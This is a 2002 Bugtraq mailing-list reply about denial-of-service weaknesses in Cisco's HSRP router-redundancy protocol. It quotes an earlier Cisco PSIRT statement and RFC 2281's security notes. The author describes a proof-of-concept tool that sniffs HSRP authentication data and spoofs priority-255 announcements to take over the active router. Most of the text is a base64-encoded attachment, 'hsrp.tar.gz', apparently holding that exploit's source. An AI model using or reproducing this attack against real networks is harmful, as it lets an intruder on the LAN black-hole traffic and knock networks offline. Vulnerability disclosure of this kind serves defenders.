[25707] in bugtraq
Re: Three possible DoS attacks against some IOS versions.
daemon@ATHENA.MIT.EDU (Big Poop)
Mon Jun 10 17:25:52 2002
Reply-To: stejones@bigfoot.com
From: "Big Poop" <ste0000@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 09 Jun 2002 13:41:25 +0100
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_18b4_106c_5b15"
Message-ID: <F5rA6WFffbpsJPSIcCA00017d33@hotmail.com>
------=_NextPart_000_18b4_106c_5b15
Content-Type: text/plain; format=flowed
a bit of source code i wrote a couple of month as proof of concept for the
HSRP DoS..... needs libpcap installed to sniff the packets to get the
authentication details + various other stuff. Spoofed packets are then send
to the multicast address informing the group that there is a new router (the
hackers machine / fake IP address) that has the top priority 255 thus
pre-empting the active router and causing a DoS
the prog runs on linux and was tested on mandrake 8
--------8<--------8<------- from previous post
an excerpt form RFC 2281 - Cisco HSRP
7. Security Considerations
This protocol does not provide security. The authentication field
found within the message is useful for preventing misconfiguration.
The protocol is easily subverted by an active intruder on the LAN.
This can result in a packet black hole and a denial-of-service
attack. It is difficult to subvert the protocol from outside the
LAN as most routers will not forward packets addressed to the
all-routers multicast address (224.0.0.2).
- ----
Cisco is considering using MD5 to improve the protection of HSRP in
future releases of IOS.
However, there are some other factors that must be considered in
this context:
- - this vulnerability can be exploited only from the local segment
(not over the Internet).
- - the same effect, denial of service, can be produced by using ARP,
which can not be protected in any way.
The last factor is especially important since it may cause a false
sense of security if the user is using a hardened version of HSRP as an
attacker can still disrupt the network by using crafted ARP packets.
Another aspect of this issue is that in its current implementation, HSRP
doesn't seem to perform a validity check on the IP addresses. This is
under active investigation as Cisco Bug ID CSCdu38323.
Cisco HSRP documentation can be found at -
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ics/cs009.htm
- --
Sharad Ahlawat.
Product Security Incident Response Team (PSIRT) Incident Manager
http://www.cisco.com/go/psirt
Phone:+1 (408) 527-6087 (Land line and Mobile)
DH/DSS key Id: 0xC12A996C
Fingerprint: 9A93 2A20 43E5 7F01 2954 C427 1A81 A898 C12A 996C
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and registering
to receive security information from Cisco, is available on Cisco's
Worldwide Web site at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
iD8DBQE8/+eLGoGomMEqmWwRAvQuAKDD0QUix/yYu+9R7ZgdJh0AK8pQdACeNa8q
ENh90WxBZqYLg3sjuLjxE0w=
=pCHF
-----END PGP SIGNATURE-----
------8<--------------8<-------------- end of previous post
--
Big Poop
root@networkpenetration.com
_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail.
http://www.hotmail.com
------=_NextPart_000_18b4_106c_5b15
Content-Type: application/x-gzip; name="hsrp.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="hsrp.tar.gz"
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
eAAA
------=_NextPart_000_18b4_106c_5b15--
